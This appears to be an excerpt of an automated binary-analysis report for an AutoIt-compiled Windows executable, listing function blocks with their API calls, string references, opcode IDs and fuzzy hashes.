  • Part of subcall function 003BC816: VariantInit.OLEAUT32(00000000), ref: 003BC882
  • Part of subcall function 003BC816: VariantCopy.OLEAUT32(00000000,?), ref: 003BC88C
• VariantClear.OLEAUT32(?), ref: 003BC556
Strings
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}A
• API String ID: 2932060187-735431763
• Opcode ID: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
• Instruction ID: 189d5d19045e8fbaf5d52fc7a489cccaaccc922b93c03619368bf55e9d55031b
• Opcode Fuzzy Hash: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
• Instruction Fuzzy Hash: 7111FAB19007089FC721DFAAD8C49DAB7F8FB08314B50862FE58AD7651E771AA44CF90
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
• Instruction ID: 96837803a5a51cfffb10cb8debc2d8c2558013f16f3f7af9938bd93dd1e236fa
• Opcode Fuzzy Hash: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
• Instruction Fuzzy Hash: 62E092326002282AD720AA99AC49FE7FBACEB45B60F01016BFD04D7151D9709B458BE4
APIs
  • Part of subcall function 0039B314: _memset.LIBCMT ref: 0039B321
  • Part of subcall function 00380940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0039B2F0,?,?,?,0036100A), ref: 00380945
• IsDebuggerPresent.KERNEL32(?,?,?,0036100A), ref: 0039B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0036100A), ref: 0039B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0039B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
• Instruction ID: d35f21fa7d16cdec57c69859374dd6cafb3434ad6ed6fda06f299a5aa10b4d72
• Opcode Fuzzy Hash: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
• Instruction Fuzzy Hash: 8AE06D782007408FDB32DF28E648342BAE8AF00704F008A7DE496CB2D0E7F4E408CBA1
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003B7C82
  • Part of subcall function 00383358: _doexit.LIBCMT ref: 00383362
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: cae6742ca2a91461044da16d850d470a6125a08ae2746973efcf6de451e0ab83
• Instruction ID: 2a21e76e0269d331145360434996a667a21cb6c3dccd123ad811602d70a64856
• Opcode Fuzzy Hash: cae6742ca2a91461044da16d850d470a6125a08ae2746973efcf6de451e0ab83
• Instruction Fuzzy Hash: 52D05E323C836837D21732B9AC07FDA7A888F05F56F144466FB18AE5D389D6998142ED
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 003A1775
  • Part of subcall function 003DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003A195E,?), ref: 003DBFFE
  • Part of subcall function 003DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DC010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003A196D
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
• Instruction ID: 4d4d90395e2818c632199c0688090993c9bf0f229018270359951952774a008e
• Opcode Fuzzy Hash: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
• Instruction Fuzzy Hash: 3DF0C971800109DFDB27DB91CA84AECBBFCEB09301F552095E142A6590D7724F85DF64
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E5981
  • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
• Instruction ID: ce929a98e844ed08f54984c0c7fe34e9c490117d6fde123694fd66adeb71f74b
• Opcode Fuzzy Hash: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
• Instruction Fuzzy Hash: 7ED0C931384351BBE675AB709C8BFD66A59AB50B55F100929B249AE1D0CAE4A840C658
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E59AE
• PostMessageW.USER32(00000000), ref: 003E59B5
  • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
• Instruction ID: 84e231b2c468f738997c523c5ae52bbac75b81aaf2d1763aea9cd3865517e98f
• Opcode Fuzzy Hash: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
• Instruction Fuzzy Hash: B5D0A9313803007BE675AB309C8BFC26A18AB40B00F000829B205EE1D0CAE0A800C658